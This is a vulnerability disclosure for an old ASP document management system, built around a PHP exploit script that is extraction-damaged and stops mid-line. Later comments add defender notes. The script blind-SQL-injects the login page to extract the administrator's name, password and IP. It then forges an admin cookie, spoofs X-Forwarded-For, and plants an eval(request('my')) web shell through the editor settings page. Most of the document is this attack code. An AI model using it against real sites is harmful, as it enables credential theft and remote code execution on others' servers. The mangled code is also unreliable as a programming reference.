Brief description:
The /user/UserLogin.asp file of the old Y Document Management System v2.5 sp2 has a SQL injection vulnerability that allows a malicious user to obtain any data in the database. In addition, the back-end login is not handled properly, so the admin account password and administrator IP address can be spoofed to fool the back-end login.
Proof of vulnerability:
Vulnerability test exploit (PHP script):
<? Php
// NOTE(review): this listing is extraction-damaged (identifier casing and the
// spacing around sigils are mangled); it is kept verbatim rather than repaired.
// Script-level setup: lift the execution time limit (the work below is a long
// run of sequential HTTP requests) and report only E_ERROR|E_WARNING|E_PARSE.
Ini_set ("max_execution_time", 0 );
Error_reporting (7 );
// Print the banner and a one-line usage hint, then terminate the script.
// Reads the global $argv so the hint shows the script's own file name; the
// top level calls this when the argument count is wrong.
Function usage ()
{
Global $ argv;
Exit (
"-- ++ ============================================ ============================================+++ --".
"-- ++ =". Base64_decode ("encoding ="). "= ++ --".
"-- ++ ============================================ ============================================+++ --".
"[+] Author: My5t3ry ".
"[+] Team: http://www.t00ls.net ".
"[+] Blog: http://www.bksec.net ".
"[+] Usage: php". $ argv [0]. ""[+] Ex.: php". $ argv [0]. "localhost /".
"");
}
// Build the value sent in the Username field: a boolean predicate that the
// vulnerable login page concatenates into its SQL text. Returned url-encoded.
//   $pos - 1-based character position (cases 1, 2, 4) or candidate length (3, 5)
//   $chr - numeric character code compared against asc(mid(...)) (cases 1, 2, 4)
//   $chs - which column of [Yao_Admin] (row id = 1) is probed:
//          1 Admin_Name char, 2 Admin_Pass char, 3 Admin_Name length,
//          4 Admin_IP char, 5 Admin_IP length. Any other value leaves $query
//          unset, so urlencode() receives no string.
// In "admin or 1 = 1 and (...)", AND binds tighter than OR, so the clause is
// true exactly when the subquery comparison holds (or the literal name matches).
// Defender note: every case has the same root cause - the Username POST value
// reaches the query text unescaped. A parameterized query (or, at minimum,
// rejecting anything outside the allowed account-name character set before the
// query is built) removes this whole class of probe. The asc/mid/len functions
// suggest a Jet/Access backend - TODO confirm.
Function query ($ pos, $ chr, $ chs)
{
Switch ($ chs ){
Case 1:
$ Query = "admin or 1 = 1 and (select asc (mid (Admin_Name, {$ pos}, 1) from [Yao_Admin] where id = 1) = {$ chr} and 1 = 1 ";
Break;
Case 2:
$ Query = "admin or 1 = 1 and (select asc (mid (Admin_Pass, {$ pos}, 1) from [Yao_Admin] where id = 1) = {$ chr} and 1 = 1 ";
Break;
Case 3:
$ Query = "admin or 1 = 1 and (select len (Admin_Name) from [Yao_Admin] where id = 1) = {$ pos} and 1 = 1 ";
Break;
Case 4:
$ Query = "admin or 1 = 1 and (select asc (mid (Admin_IP, {$ pos}, 1) from [Yao_Admin] where id = 1) = {$ chr} and 1 = 1 ";
Break;
Case 5:
$ Query = "admin or 1 = 1 and (select len (Admin_IP) from [Yao_Admin] where id = 1) = {$ pos} and 1 = 1 ";
Break;
}
$ Query = urlencode ($ query );
Return $ query;
}
// Send one probe to the login page and return the raw HTTP response.
//   $hostname - target host; a plain TCP connection is opened on port 80
//   $path     - URL prefix under which User/Userlogin.asp lives
//   $pos, $chr, $chs - forwarded to query(); $chr is passed through ord()
//                      first, so callers hand in a one-character string
//                      (lengthcolumns() passes 0, which the length cases ignore)
// Returns the whole response (status line, headers, body) as one string.
// The request is a hand-built HTTP/1.1 POST with a fixed ASPSESSIONID cookie
// and Connection: Close; the reply is collected with fgets() until EOF.
// NOTE(review): $reply is appended to without being initialised, and the line
// breaks between the header strings are lost in this extraction.
// Defender note: the only per-request variation is the Username field, so the
// server-side picture is a burst of POSTs to UserLogin.asp?Action=login from
// one client with "or 1 = 1" in the account name - a clear log/WAF signature,
// though no substitute for fixing the query itself.
Function exploit ($ hostname, $ path, $ pos, $ chr, $ chs)
{
$ Chr = ord ($ chr );
$ Conn = fsockopen ($ hostname, 80 );
If (! $ Conn ){
Exit ("[-] No response from $ conn ");
}
$ Postdata = "Username =". query ($ pos, $ chr, $ chs). "& PassWord = aaaaaa & Submit = % B5 % C7 % C2 % BC ";
$ Message = "POST". $ path. "User/Userlogin. asp? Action = login HTTP/1.1 ";
$ Message. = "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash ,*/*";
$ Message. = "Accept-Language: zh-cn ";
$ Message. = "Content-Type: application/x-www-form-urlencoded ";
$ Message. = "Accept-Encoding: gzip, deflate ";
$ Message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1 )";
$ Message. = "Host: $ hostname ";
$ Message. = "Content-Length:". strlen ($ postdata )."";
$ Message. = "Cookie: ASPSESSIONIDSSCTBRDD = ILJJFNOABJJHHDMPDBAEJIGC ";
$ Message. = "Connection: Close ";
$ Message. = $ postdata;
Fputs ($ conn, $ message );
// Read until the server closes the connection (Connection: Close above).
While (! Feof ($ conn ))
$ Reply. = fgets ($ conn, 1024 );
Fclose ($ conn );
Return $ reply;
}
// Recover Admin_Name one character position at a time.
//   $hostname, $path - forwarded to exploit()
//   $chs             - column selector forwarded to query() (1 = Admin_Name char)
// Uses the global $length (set by lengthcolumns()) as the number of positions
// and appends each recovered character to the global $user, echoing it too.
// For each position the candidates in $key (lowercase letters and digits) are
// tried in order; a response carrying the Set-Cookie header that the
// preg_match() looks for is taken to mean the injected predicate was true,
// i.e. the login succeeded - that is the boolean oracle. Regex delimiters and
// escapes are lost in this extraction, so the exact header is unclear - TODO.
// Defender note: the oracle exists only because the login page issues a session
// cookie for any query that matched a row; parameterizing that query closes it,
// and lockout/rate limiting on repeated failed logins from one source blunts
// per-character probing of this kind as a second layer.
Function crkusername ($ hostname, $ path, $ chs)
{
Global $ length, $ user;
$ Key = "abcdefghijklmnopqrstuvwxyz0123456789 ";
$ Chr = 0;
$ Pos = 1;
Echo "[+] username :";
While ($ pos <= $ length)
{
$ Response = exploit ($ hostname, $ path, $ pos, $ key [$ chr], $ chs );
// Oracle: presence of the matched Set-Cookie header == predicate was true.
Preg_match (/Set-Cookie: s ([A-Za-z] {3}) = ID =/, $ response, $ match );
If (strlen (trim ($ match [1])! = 0)
{
$ User. = $ key [$ chr];
Echo $ key [$ chr];
$ Chr = 0;
$ Pos ++;
}
Else
$ Chr ++;
}
Echo "";
}
// Recover Admin_Pass one character position at a time, same oracle loop as
// crkusername() but with a fixed 18 positions and a hex-style candidate set
// ($key = a-f and digits, which looks like a hex-encoded digest - TODO confirm).
//   $hostname, $path - forwarded to exploit()
//   $chs             - column selector forwarded to query() (2 = Admin_Pass char)
// Appends each recovered character to the global $pass and echoes it.
// Defender note: whatever is stored in Admin_Pass is later replayed verbatim in
// the LaoYAdmin cookie by getshell(), so the stored value is itself a usable
// credential; a salted, slow password hash plus server-side sessions (rather
// than a cookie carrying the stored value) removes that property.
Function crkpassword ($ hostname, $ path, $ chs)
{
Global $ pass;
$ Key = "abcdef0123456789 ";
$ Chr = 0;
$ Pos = 1;
Echo "[+] password :";
While ($ pos <= 18)
{
$ Response = exploit ($ hostname, $ path, $ pos, $ key [$ chr], $ chs );
// Oracle: presence of the matched Set-Cookie header == predicate was true.
Preg_match (/Set-Cookie: s ([A-Za-z] {3}) = ID =/, $ response, $ match );
If (strlen (trim ($ match [1])! = 0)
{
$ Pass. = $ key [$ chr];
Echo $ key [$ chr];
$ Chr = 0;
$ Pos ++;
}
Else
$ Chr ++;
}
Echo "";
}
// Determine the length of a column value by testing candidate lengths 1, 2, ...
// through the same login oracle until one matches.
//   $hostname, $path - forwarded to exploit()
//   $chs             - column selector forwarded to query() (3 = Admin_Name
//                      length, 5 = Admin_IP length); $chr is passed as 0 and
//                      is unused by the length cases
// Returns the matched length. Aborts the whole script with "[+] Exploit Failed."
// once the candidate reaches 20 without a match.
// NOTE(review): the "=" in `While ($ exit = 0)` and `If ($ pos = 20)` reads as
// assignment in PHP; presumably "==" in the original, lost in extraction.
Function lengthcolumns ($ hostname, $ path, $ chs)
{
$ Exit = 0;
$ Length = 0;
$ Pos = 1;
$ Chr = 0;
While ($ exit = 0)
{
$ Response = exploit ($ hostname, $ path, $ pos, $ chr, $ chs );
// Oracle: presence of the matched Set-Cookie header == predicate was true.
Preg_match (/Set-Cookie: s ([A-Za-z] {3}) = ID =/, $ response, $ match );
If (strlen (trim ($ match [1])! = 0)
{
$ Exit = 1;
$ Length = $ pos;
}
Else
$ Pos ++;
If ($ pos = 20)
Exit ("[+] Exploit Failed .");
}
Return $ length;
}
// Recover Admin_IP one character position at a time, same oracle loop as
// crkusername() with a candidate set of digits and "." (a dotted IPv4 string).
//   $hostname, $path - forwarded to exploit()
//   $chs             - column selector forwarded to query() (4 = Admin_IP char)
// Uses the global $iplength (from lengthcolumns()) as the number of positions
// and appends each recovered character to the global $adminip, echoing it.
// Defender note: the only reason this value matters is that getshell() later
// presents it in an X-FORWARDED-FOR header, which implies the back end compares
// a client-supplied header against Admin_IP - TODO confirm. An IP allow-list
// that reads a forwarded header instead of the socket peer address offers no
// protection against a direct client.
Function crkadminip ($ hostname, $ path, $ chs)
{
Global $ iplength, $ adminip;
$ Key = "1234567890 .";
$ Chr = 0;
$ Pos = 1;
Echo "[+] adminip :";
While ($ pos <= $ iplength)
{
$ Response = exploit ($ hostname, $ path, $ pos, $ key [$ chr], $ chs );
// Oracle: presence of the matched Set-Cookie header == predicate was true.
Preg_match (/Set-Cookie: s ([A-Za-z] {3}) = ID =/, $ response, $ match );
If (strlen (trim ($ match [1])! = 0)
{
$ Adminip. = $ key [$ chr];
Echo $ key [$ chr];
$ Chr = 0;
$ Pos ++;
}
Else
$ Chr ++;
}
Echo "";
}
// Second stage: post a StyleSetSave request to the admin editor-settings page
// while impersonating the administrator, and return the raw HTTP response.
//   $hostname - target host (plain TCP to port 80, as in exploit())
//   $path     - URL prefix under which Admin/EditorAdmin/style.asp lives
//   $user, $pass, $adminip - the values recovered by the crk*() functions
// The admin identity is asserted with two client-controlled inputs: a
// LaoYAdmin cookie carrying UserName/UserPass/UserID=1, and an X-FORWARDED-FOR
// header set to $adminip. The posted settings are mostly fixed editor options;
// the d_imageext field carries a url-encoded eval(request("my")) fragment.
// NOTE(review): $reply is appended to without being initialised, and the line
// breaks between the header strings and inside $postdata are lost in this
// extraction.
// Defender note: three server-side weaknesses are relied on here, each with a
// standard fix. (1) Admin authentication is a cookie containing the stored
// credentials, so anyone who has read them can replay it - use opaque
// server-side sessions instead. (2) The administrator-IP check apparently trusts
// X-Forwarded-For, which any client sets freely - decide on the socket peer
// address only (or drop the check). (3) The StyleSetSave handler apparently
// persists posted settings somewhere they are later interpreted as ASP - TODO
// confirm; settings must be validated against the expected format and stored as
// data, never written into executable script files.
Function getshell ($ hostname, $ path, $ user, $ pass, $ adminip)
{
$ Conn = fsockopen ($ hostname, 80 );
If (! $ Conn ){
Exit ("[-] No response from $ conn ");
}
$ Postdata = "d_name = user & d_initmode = EDIT & d_fixwidth = & d_skin = light1 & d_width = 500 & d_height = 300 & d_stateflag =
1 & d_sbedit =
1 & d_sbview = 1 & d_detectfromword = 1 & d_autoremote = 0 & d_showborder = 0 & d_entermode =
1 & d_areacssmode = 0 & d_memo = 500px % BF % ED % B6 % C8 % BD % E7 % C3 % E6 % CF % C2 % B5 % C4 % D7 % EE % BC % f2 % B9 % A4 % BE % DF % C0 % B8 % B0 % B4 % C5 % A5 % 2C % CA % BA % CF % D3 % DA % D3 % CA % BC % FE % CF % B5 % CD % B3 % C1 % F4 % D1 % D4 % CF % B5 % CD % B3 % B5 % C8 % D6 % BB % D0 % E8 % d7 % EE % BC % F2 % B5 % A5 % B9 % A6 % C4 % DC % B5 % C4 % D3 % A6 % D3 % C3 & d_uploadobject = 0 & d_autodir = 2 & d_allowbrowse = 0 & d_cusdirflag = 0 & d_baseurl = 1 & d_uploaddir = .. % 2 FPreviousFiles % 2F & d_basehref = & d_contentpath = & d_imageext = gif % 7 Cjpg % 7 Cjpeg % 7 Cbmp % 7C % 22% 3 Aeval % 28 request % 28% 22my % 22% 29% 29% 27 & d_imagesize = 0 & d_flashext = swf & d_flashsize = 0 & d_mediaext = rm % 7Cmp3% 7 Cwav % 7 Cmid % 7 Cmidi % 7Cra % 7 Cavi % 7 Cmpg % 7 Cmpeg % 7 Casf % 7 Casx % 7 Cwma % 7 Cmov & d_mediasize = 0 & d_fileext = rar % 7 Czip % 7 Cpdf % 7 Cdoc % 7 Cxls % 7 Cppt % 7 Cchm % 7 Chlp & d_filesize = 0 & d_remoteext = gif % 7 Cjpg % 7 Cbmp & d_remotesize = 0 & d_localext = gif % 7 Cjpg % 7 Cbmp % 7 Cwmz % 7 Cpng & d_localsize = 0 & d_sltsyobject = 0 & d_sltsyext = jpg % 7 Cjpeg & d_sltflag = 0 & d_sltminsize = 300 & d_sltoksize = 120 & d_sywzflag = 0 & d_sywzminwidth =
100 & d_sywzminheight = 100 & d_sytext = % B0 % E6 % C8 % A8 % CB % F9 % D3 % d0... & d_syfontcolor = 000000 & d_syshadowcolor = FFFFFF & d_syshadowoffset = 1 & d_syfontsize =
12 & d_syfontname = % CB % CE % CC % E5 & d_sywzposition = 1 & d_sywzpaddingh = 5 & d_sywzpaddingv = 5 & d_sywztextwidth = 66 & d_sywztextheight =
17 & d_sytpflag =
0 & d_sytpminwidth = 100 & d_sytpminheight = 100 & d_sytpposition = 1 & d_sytppaddingh = 5 & d_sytppaddingv =
5 & d_sypicpath =
& D_sytpopacity = 1 & d_sytpimagewidth = 88 & d_sytpimageheight = 31 ";
$ Message = "POST". $ path. "Admin/EditorAdmin/style. asp? Action = StyleSetSave & id = 1 HTTP/1.1 ";
$ Message. = "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash ,*/*";
$ Message. = "Accept-Language: zh-cn ";
$ Message. = "Content-Type: application/x-www-form-urlencoded ";
$ Message. = "Accept-Encoding: gzip, deflate ";
$ Message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1 )";
$ Message. = "Host: $ hostname ";
// Client-supplied header presented as the "administrator IP" (see note above).
$ Message. = "X-FORWARDED-FOR:". $ adminip ."";
// Admin identity asserted purely from cookie contents (see note above).
$ Message. = "Cookie: ASPSESSIONIDCADSSCQQ = OKLJGOECENDGHDLAKKIKBCAB; LaoYAdmin = UserName =". $ user. "& UserPass =". $ pass. "& UserID = 1 ";
$ Message. = "Content-Length:". strlen ($ postdata )."";
$ Message. = "Connection: Close ";
$ Message. = $ postdata;
Fputs ($ conn, $ message );
// Read until the server closes the connection (Connection: Close above).
While (! Feof ($ conn ))
$ Reply. = fgets ($ conn, 1024 );
Fclose ($ conn );
Return $ reply;
}
If ($ argc! = 3)
Usage ();
$ Hostname = $ argv [1];
$ Path = $ argv [2];
Echo "[+] Len (username ):";
$ Length = lengthcolumns ($ hostname, $ path, 3 );
Echo $ length